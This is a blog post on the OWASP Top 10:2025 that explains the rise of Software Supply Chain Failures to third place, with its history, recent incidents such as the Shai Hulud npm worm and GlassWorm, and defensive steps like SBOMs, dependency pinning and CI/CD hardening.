Why OWASP Top 10 2025’s #3 Risk Demands Your Immediate Attention

In November 2025, the Open Web Application Security Project (OWASP) released its eighth edition of the Top 10 security risks, and the message is clear: software supply chain security has graduated from a niche concern to one of the most critical threats facing modern organizations. Ranked at position #3 with an alarming 5.19% incidence rate, Software Supply Chain Failures represents a paradigm shift in how we must approach application security.

Contents

The Wake-Up Call: Why Now?

The elevation of supply chain security to the #3 position isn’t arbitrary. It reflects the harsh reality of our interconnected software ecosystem. In the 2025 community survey, exactly 50% of respondents ranked supply chain failures as their #1 concern, making it the most voted risk category in OWASP history.

The stakes have never been higher. Recent attacks demonstrate the devastating potential:

  • Shai Hulud worm (September 2025): First successful self-replicating attack in the npm ecosystem, compromising 500+ packages and harvesting credentials from developer machines through malicious post-install scripts
  • GlassWorm attack (2025): Malicious VS Code marketplace extension deployed self-replicating code that harvested secrets from developer machines and emptied crypto wallets
  • SolarWinds compromise (2020): Affected over 18,000 organizations globally through compromised software updates

Understanding the Evolution

To understand why supply chain security has become so critical, we need to trace its evolution through OWASP’s Top 10 lists:

2013: The Beginning

A9 – Using Components with Known Vulnerabilities first appeared in 2013. At this stage, the focus was narrow: organizations simply needed to update libraries with known security flaws. The solution seemed straightforward: patch your dependencies.

2017: Maintaining Status

The risk persisted at A9:2017 - Using Components with Known Vulnerabilities, remaining in the same position. While the problem was recognized, the scope hadn’t expanded beyond vulnerable components.

2021: Broadening Scope

By 2021, the category evolved to A06:2021 - Vulnerable and Outdated Components. The name change reflected growing awareness that the problem wasn’t just about known vulnerabilities — outdated components, even without CVEs, posed significant risks.

2025: The Paradigm Shift

Now, in 2025, we have A03:2025 - Software Supply Chain Failures (jumped to #3 position!). This isn’t just a name change — it’s a fundamental reimagining of the threat. The scope now encompasses everything involved in building, distributing, and updating software:

  • Third-party dependencies and libraries
  • Build systems and CI/CD pipelines
  • Package repositories (npm, PyPI, Maven Central)
  • Developer tools and IDE extensions
  • Distribution infrastructure
  • Software update mechanisms
OWASP Top 10: Software Supply Chain Security Evolution From Component Vulnerabilities to Software Supply Chain Failures (2013-2025) Supply Chain Security 2013 Position #9 A9: Using Components with Known Vulnerabilities Focus: Patch your dependencies 2017 Position #9 A9: Using Components with Known Vulnerabilities Status: Unchanged scope 2021 Position #6 ⬆ A06: Vulnerable and Outdated Components Broader: Not just CVEs 2025 🚀 Position #3 ⬆⬆ A03: Software Supply Chain Failures 50% voted #1 concern 5.19% incidence rate Highest exploit score Key Evolution 2013-2017: • Narrow focus on CVEs • Simple patching 2021: • Outdated components • Unmaintained libs 2025: • Entire supply chain • CI/CD pipelines • Build systems • Developer tools • Self-replicating attacks Real-World Attacks Shai Hulud (Sep 2025) First self-replicating npm worm, 500+ packages compromised GlassWorm (2025) VS Code marketplace extension attack SolarWinds (2020) 18,000+ organizations affected globally 2025 Statistics 50% Community Vote Ranked as #1 concern 5.19% Incidence Highest in Top 10 Highest Impact 2025 Threat Scope ✓ Dependencies & libraries ✓ Build systems ✓ CI/CD pipelines ✓ Package repositories ✓ Developer workstations ✓ IDE extensions ✓ Distribution infrastructure ✓ Update mechanisms ✓ Entire build process OWASP Top 10:2025 | Source: https://owasp.org/Top10/

Why This Matters to Your Organization

The Attack Surface Has Exploded

Modern applications are built on stacks of dependencies. A typical web application might have hundreds or thousands of direct and transitive dependencies. Each one represents a potential entry point for attackers.

“Despite the increased scope, supply chain failures continue to be a challenge to identify with only 11 Common Vulnerability and Exposures (CVEs) having the related CWEs.” — (OWASP Top 10:2025)

This detection challenge is precisely what makes supply chain attacks so dangerous. Traditional security tools struggle to identify these threats, yet they have the highest average exploit and impact scores from CVEs in the entire OWASP Top 10.

Developers Are Now Prime Targets

The GlassWorm attack demonstrated a terrifying evolution: attackers are now targeting developer workstations as entry points. By compromising developer tools and extensions, malicious actors gain access to trusted environments where traditional security controls are often relaxed.

Once a developer’s machine is compromised, the malware can:

  • Harvest credentials and API tokens
  • Inject malicious code into repositories
  • Propagate through CI/CD pipelines
  • Access production environments

The Trust Problem

Supply chain attacks exploit our fundamental need to trust external code. When you install a package from npm or PyPI, you’re implicitly trusting:

  • The package maintainer’s security practices
  • The integrity of the repository infrastructure
  • All transitive dependencies
  • The build and distribution pipeline

A compromise at any point in this chain can cascade throughout your entire application.

Taking Action: Protecting Your Supply Chain

OWASP’s recommendations for managing supply chain risk focus on visibility, verification, and vigilance:

1. Maintain Software Bill of Materials (SBOM)

Know exactly what’s in your software stack. An SBOM provides a comprehensive inventory of all components, including transitive dependencies. This visibility is crucial for rapid response when vulnerabilities are disclosed.

2. Implement Software Composition Analysis (SCA)

Use automated tools to continuously monitor your dependencies for:

  • Known vulnerabilities (CVEs)
  • Outdated or unmaintained components
  • License compliance issues
  • Suspicious package updates

3. Verify Package Integrity

Only obtain components from official, trusted sources over secure channels. Prefer signed packages to reduce the risk of including modified, malicious components. Verify checksums and signatures before use.

4. Secure Your CI/CD Pipeline

Your build infrastructure is now part of your attack surface. Treat CI/CD systems with the same rigor as production:

  • Implement strong access controls and authentication
  • Use separate credentials for different pipeline stages
  • Monitor and log all pipeline activities
  • Scan build artifacts for malware

5. Harden Developer Workstations

Given that developers are now prime targets, secure their environments:

  • Restrict and monitor IDE extension installations
  • Implement endpoint detection and response (EDR) solutions
  • Use separate accounts for development and browsing
  • Regularly scan for compromised credentials

6. Adopt Dependency Management Best Practices

  • Pin dependency versions instead of using version ranges
  • Review and test updates before deploying
  • Monitor for suspicious update patterns
  • Consider using private package mirrors
  • Implement virtual patches when direct updates aren’t possible

The Bottom Line

The elevation of Software Supply Chain Failures to position #3 in the OWASP Top 10 isn’t just a ranking — it’s a call to action. The attacks are real, the consequences are severe, and the threat is only growing.

With the highest incidence rate (5.19%) and the highest average exploit and impact scores, supply chain failures represent a perfect storm of prevalence, difficulty to detect, and potential damage. Organizations that treat this as just another checkbox security item do so at their peril.

The message from OWASP is clear: supply chain security is no longer optional. It’s not a future problem — it’s a right now problem that demands immediate, sustained attention.

What’s Next?

Start by conducting a supply chain risk assessment for your organization:

  1. Inventory all dependencies across your applications
  2. Identify critical components and high-risk dependencies
  3. Assess your current visibility and monitoring capabilities
  4. Evaluate your CI/CD pipeline security
  5. Review developer workstation security policies
  6. Implement continuous monitoring and alerting

The full OWASP Top 10:2025 is available at https://owasp.org/Top10/.

The software supply chain has become one of the most critical battlegrounds in cybersecurity. The question isn’t whether your organization will be targeted — it’s whether you’ll be prepared when it happens.

Feel free to contact me for any suggestions and feedbacks. I would really appreciate those.

Thank you for reading!

Back to Top⮭